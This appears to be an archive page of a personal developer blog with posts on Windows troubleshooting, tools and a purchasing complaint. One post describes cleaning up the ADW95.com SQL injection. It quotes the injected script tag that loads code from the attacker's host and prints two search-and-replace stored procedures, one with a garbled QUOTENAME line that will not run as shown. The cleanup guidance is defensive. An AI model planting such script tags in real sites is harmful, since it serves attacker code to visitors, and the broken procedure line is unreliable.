Windows Update Problems

I’ve been having some problems with Windows Update not working properly, but not returning any error messages. The scan would start, stay at 0% for a few seconds, and then display the message ‘Windows Update has encountered an error and cannot display the requested page.

After spending a couple of hours looking for a solution and trying lots of different things, including clearing cache, deleting some system folders, deleting some system files, stopping and restarting services, etc, I came across a forum post suggesting re-installing the Windows Update Agent.

This solved the problem!

I’ve had similar issues on other machines in the past, with Windows Update not working, though the updates would download fine; they just wouldn’t install.  Re-installing the Windows Update Agent on these machines also fixed these issues.

If you’re having any issues with Windows Update, the first thing to try is re-installing this as it seems to fix a lot of the issues.

Download it here:

http://go.microsoft.com/fwlink/?LinkId=43264 (x86)
http://go.microsoft.com/fwlink/?LinkId=43265 (x64)

Once downloaded, run the following command:

WindowsUpdateAgent20-x86.exe /wuforce

Reinstallation takes a couple of minutes, after which you should be able to run Windows Update again without any problems.

Posted by Mun on July 11, 2008 at 9:58 am | Comments (0)

Logitech MX3200 Zoom Bar Solution

A couple of months ago, the cordless mouse in my 18 month Logitech Desktop MX3000 set finally got to me with it’s broken clicker, and a quick call to Logitech sorted it out.

Customer service was excellent. The call took about 5 minutes, got an RMA number, sent off the damaged mouse and receiver, and a week later I had a brand new MX3200 cordless desktop to replace the now-obsolete MX3000.

I’m generally a fan of Logitech products, but don’t know what the deal is with all of these fancy media buttons on their newer keyboards, which seems to be getting worse with each model.  My first frustration was with the resized F keys (which are used quite a lot in VS.NET for shortcuts, etc), though this isn’t too bad once you get used to it.

But the most annoying feature had to be the zoom bar on the left hand side of the keyboard:

Mx3200_1

As some other reviewers on Amazon.com have noted (though many don’t agree), this feature can be easily activated, and cause your browser text to quickly size up to a ridiculously large font-size through a misplaced finger during random browsing.  After find nothing searching through Logitech setpoint for a way to disable this feature, and no useful information Googling for answers, there turned out to be a much simpler solution:

MX3200

That’s right, covering the annoying zoom bar using a piece of paper (or in this case, an old receipt) and some sticky tape.

Sometimes the quickest and easiest solution really is a low-tech one (though perhaps it doesn’t look the best!)

Posted by Mun on June 27, 2008 at 11:34 am | Comments (0)

Problems with file sharing in Windows XP

About a week ago, my Windows XP Pro x64 machine randomly stopped allowing network access to file shares.  The guest account was enabled, but any access to \\machinename from other machines on the network showed the following error:

Logon Failure: the user has not been granted the requested logon type

The quickest solution for this was to do the following:

  1. Go to start – settings - control panel - administrative tools
  2. Go to Local Security Policy
  3. Expand the Local Policies node
  4. Expand the User Rights Assignment node
  5. Double click on the Deny access to this computer from the network node in the right hand pane
  6. Click on Guest in the properties window that opens up
  7. Click Remove
  8. Click OK

Not sure why this randomly stopped working, but all seems well now.

Posted by Mun on June 13, 2008 at 9:39 pm | Comments (0)

Cleaning up ADW95.com exploit

Recently, a client’s website got affected by the ADW95.com SQL injection attack, which is also known as Banner82 or Direct84. This exploit seems to modify the database, and add the following (or something similar) to all text fields of all tables in the database:

<script src=http://www.adw95.com/b.js></script>

However, it seems somewhat random, with some tables seemingly fine, and others affected. In many cases, it actually gets appended several times, and often becomes an invalid tag, like something below:

<scr<scriptsrc=http://adw95.com/b.js></sc</script>

This seems like a common explot; searching Google for adw95/b.js returns 248,000 results, with all the sites looking like they have been hit with this.

There’s a great post by John Forsythe, who was hit with the same exploit, detailing how he got rid of this foreign text. The primary tools for cleaning up are a couple of very useful stored procedures for finding and finding and replacing strings across all fields in a database. I’ve included these below:

Finding text in all fields in all tables:

CREATE PROC SearchAllTables
(
	@SearchStr nvarchar(100)
)
AS
BEGIN

	-- Copyright © 2002 Narayana Vyas Kondreddi. All rights reserved.
	-- Purpose: To search all columns of all tables for a given search string
	-- Written by: Narayana Vyas Kondreddi
	-- Site: http://vyaskn.tripod.com
	-- Tested on: SQL Server 7.0 and SQL Server 2000
	-- Date modified: 28th July 2002 22:50 GMT

	CREATE TABLE #Results (ColumnName nvarchar(370), ColumnValue nvarchar(3630))

	SET NOCOUNT ON

	DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110)
	SET  @TableName = ''
	SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')

	WHILE @TableName IS NOT NULL
	BEGIN
		SET @ColumnName = ''
		SET @TableName =
		(
			SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))
			FROM 	INFORMATION_SCHEMA.TABLES
			WHERE 		TABLE_TYPE = 'BASE TABLE'
				AND	QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName
				AND	OBJECTPROPERTY(
						OBJECT_ID(
							QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)
							 ), 'IsMSShipped'
						       ) = 0
		)

		WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)
		BEGIN
			SET @ColumnName =
			(
				SELECT MIN(QUOTENAME(COLUMN_NAME))
				FROM 	INFORMATION_SCHEMA.COLUMNS
				WHERE 		TABLE_SCHEMA	= PARSENAME(@TableName, 2)
					AND	TABLE_NAME	= PARSENAME(@TableName, 1)
					AND	DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')
					AND	QUOTENAME(COLUMN_NAME) > @ColumnName
			)

			IF @ColumnName IS NOT NULL
			BEGIN
				INSERT INTO #Results
				EXEC
				(
					'SELECT ' + @TableName + '.' + @ColumnName + ', LEFT(' + @ColumnName + ', 3630)
					FROM ' + @TableName + ' (NOLOCK) ' +
					' WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2
				)
			END
		END
	END

	SELECT ColumnName, ColumnValue FROM #Results
END

Find and replace text in all fields in all tables:

CREATE PROC SearchAndReplace
(
	@SearchStr nvarchar(100),
	@ReplaceStr nvarchar(100)
)
AS
BEGIN

	-- Copyright © 2002 Narayana Vyas Kondreddi. All rights reserved.
	-- Purpose: To search all columns of all tables for a given search string and replace it with another string
	-- Written by: Narayana Vyas Kondreddi
	-- Site: http://vyaskn.tripod.com
	-- Tested on: SQL Server 7.0 and SQL Server 2000
	-- Date modified: 2nd November 2002 13:50 GMT

	SET NOCOUNT ON

	DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110), @SQL nvarchar(4000), @RCTR int
	SET  @TableName = ''
	SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')
	SET @RCTR = 0

	WHILE @TableName IS NOT NULL
	BEGIN
		SET @ColumnName = ''
		SET @TableName =
		(
			SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))
			FROM 	INFORMATION_SCHEMA.TABLES
			WHERE 		TABLE_TYPE = 'BASE TABLE'
				AND	QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName
				AND	OBJECTPROPERTY(
						OBJECT_ID(
							QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)
							 ), 'IsMSShipped'
						       ) = 0
		)

		WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)
		BEGIN
			SET @ColumnName =
			(
				SELECT MIN(QUOTENAME(COLUMN_NAME))
				FROM 	INFORMATION_SCHEMA.COLUMNS
				WHERE 		TABLE_SCHEMA	= PARSENAME(@TableName, 2)
					AND	TABLE_NAME	= PARSENAME(@TableName, 1)
					AND	DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')
					AND	QUOTENAME(COLUMN_NAME) > @ColumnName
			)

			IF @ColumnName IS NOT NULL
			BEGIN
				SET @SQL=	'UPDATE ' + @TableName +
						' SET ' + @ColumnName
						+ ' =  REPLACE(' + @ColumnName + ', '
						+ QUOTENAME(@SearchStr, ') + ', ' + QUOTENAME(@ReplaceStr, ') +
						') WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2
				EXEC (@SQL)
				SET @RCTR = @RCTR + @@ROWCOUNT
			END
		END
	END

	SELECT 'Replaced ' + CAST(@RCTR AS varchar) + ' occurence(s)' AS 'Outcome'
END

To clean up the mess, first execute the following to find all of the injected text:

EXEC SearchAllTables ‘<script’

This will return a table of all field names and their values containing the specified text. You’ll then need to run the SearchAndReplace stored procedure for each instance of the foreign text. In my case, I had about 200 affected rows and had to run the stored procedure about 25 times to get rid of all of them.

It’s likely that some data will also be corrupted both by exploit and during the cleanup process, and may not be recoverable.

ZDNet has more information about this exploit in the article, Fast-Fluxing SQL injection attacks executed from the Asprox botnet.

Posted by Mun on June 2, 2008 at 10:27 pm | Comments (0)

Another filler text generator

If you’re tired of using Lorem Ipsum as filler text, check out this filler text generator. It’s got lorem ipsum, English, jabberwock and tagalog. You can also choose the number of paragraphs and the paragraph length. Useful stuff.

Filler text generator

[Via Contract Worker]

Posted by Mun on January 13, 2008 at 2:42 pm | Comments (0)

DB Object QuickFind for SQL Server Management Studio

Came across this excellent SQL Server Management Studio add-in, which has some cool fuzzy search technology for quickly finding objects.

SQL Server Management Studio Quick Find

I’ve been using this sp_grep script for searching databases, and having a visual tool now that can do this a lot more convenient. The sp_grep script also searches stored procedure text, table columns, etc so it’s a bit more powerful, though Joseph Coony offers the source code for this add-in on his blog if you want to modify this add-on to extend its search capabilities.

Found out about this from SecretGeek, who points out that the search technology is by an Australian Micro-ISV called ShuffleText.  As Leon says:

At their blog you will find an incredible, epic and very honest post about building a micro isv

He’s right - the blog entry is excellent reading.  Check it out at The birth of a Micro ISV.

Tags: , ,
Posted by Mun on December 1, 2007 at 10:07 pm | Comments (0)

Uppercase Database

Why do some developers feel the need to capitalize everything in the database? It just looks ugly…

UppercaseDatabase

Not to mention the inconsistency here with some database tables being named using singular representations and others named using plurals.

Posted by Mun on November 13, 2007 at 12:41 pm | Comments (1)

Problems with taking on new projects

Taking on new maintenance projects is always a bit scary, especially with those asp.net projects where the code is compiled and can’t be completely seen beforehand (though it’s sometimes possible to get an idea using Reflector).

It’s a little more worrying when the existing developer says to the client:

[The code] is completely as-is, with no warranty whatsoever and no suggestion that it is fit or otherwise for any particular purpose, and a hold-blameless clause in all eventualities.

Nice. This seems like one of those cases where the developer has lost interest in the project, doesn’t particularly need the work anymore, and wants to get rid of it without accepting any liability for the work done.

On the upside, at least the project is relatively small…

Posted by Mun on November 7, 2007 at 12:14 pm | Comments (0)

Winamp 5.5 - no thanks

Just saw this when loading up Winamp:

Winamp 5.5

The bloat in new versions of Winamp is getting ridiculous. Mp3 blog and remote access?!  No thanks.

Maybe it’s time to try this Winamp alternative, as recommended by a commenter in this post, though it does look a little too basic.

The best software change I’ve made has to be moving from Adobe Reader to FoxIt PDF Reader which is much, much better than Adobe’s bloatware.

Posted by Mun on November 5, 2007 at 11:00 am | Comments (0)

Buying VisualSVN - an experience with ShareIt.com

I’ve been using VisualSVN for a few weeks now, and found it to be an excellent Visual Studio plugin which does exactly what it says on the tin. The VS integration makes it a lot easier to use SVN for source control (rather than having to alt+tab back to Explorer and use TortoiseSVN).

Since Jeff’s post about supporting small software vendors makes a lot of sense, when my free trial expired a couple of days ago, I decided to grab a copy, and started what is probably one of the crappiest experiences I’ve had buying stuff online (second to WorldPay, who have the top spot).

For reasons unknown, VisualSVN are using ShareIt.com (a division of Digital River) for selling their software. This is what I’ve had to go through so far to try and buy a license:

  1. Fill in form with various details - name, address, email, etc.  Chose Paypal as method of payment.
  2. Sign into Paypal (UK account), authorize payment.
  3. Wait 20 hours.  Receive email to tell me payment has not been accepted.
  4. Click on link to change payment. Enter credit card number. Submit payment
  5. Error about being unable to use free email address (Gmail) with credit card payments
  6. Try and change email address to a non-free domain
  7. Error about being unable to use this email address
  8. Try another email address
  9. Error about being unable to use this email address
  10. Give up, and choose Paypal again
  11. Sign into Paypal (US account) and make payment from US bank account
  12. Wait 18 hours. Receive email to tell me payment has not been accepted again
  13. Go back to Buy page, and start process again. Enter details again, but enter a non-free email address. Choose credit card as payment, enter card details. Receive email telling me my order will take 4-24 hours to process.
  14. Waited 3 hours.  Receive email saying order has been declined.

So, I’ve used two paypal accounts with two different payment methods, as well as trying to use my credit card directly, and still haven’t managed to buy a license successfully.

If VisualSVN/ShareIt.com could make the process any more painful, I don’t know how.  In the Internet-age where it’s easy enough to do real-time credit card processing and with systems like Paypal in place, buying a $49 software licence could (and should) be as simple as entering Name & Email, signing into Paypal to make payment and receiving a license key by email within a couple of minutes.

If anyone from VisualSVN is reading this, please change your payment process. I really expect a better buying experience from a company selling software (especially when it’s good software!).

Update - 05 November 2007: Emailed sales yesterday, explained what I was going through and then tried to buy a license again. Unsurprisingly, got an email this morning from ShareIt.com yet again declining my order.  Also heard back from someone in sales asking me to share my best experience of buying software on the web (though no mention of any discount for all this trouble I’ve gone through, or even offering another way to pay).  WTF.  All I’m asking for is a system that *works*. I’m really starting to believe these folks don’t want to sell their software!

Update - 06 November 2007: After trying for a fourth time to buy a license, and having heard nothing back from the sales team for 2 days, I’ve given up. It’s simply not worth the hassle dealing with them. If the sales team can’t be bothered to reply to someone who has tried to buy their software four times, then there’s something very wrong.

Tags: , , , , , ,
Posted by Mun on November 3, 2007 at 11:11 am | Comments (0)
Previous Posts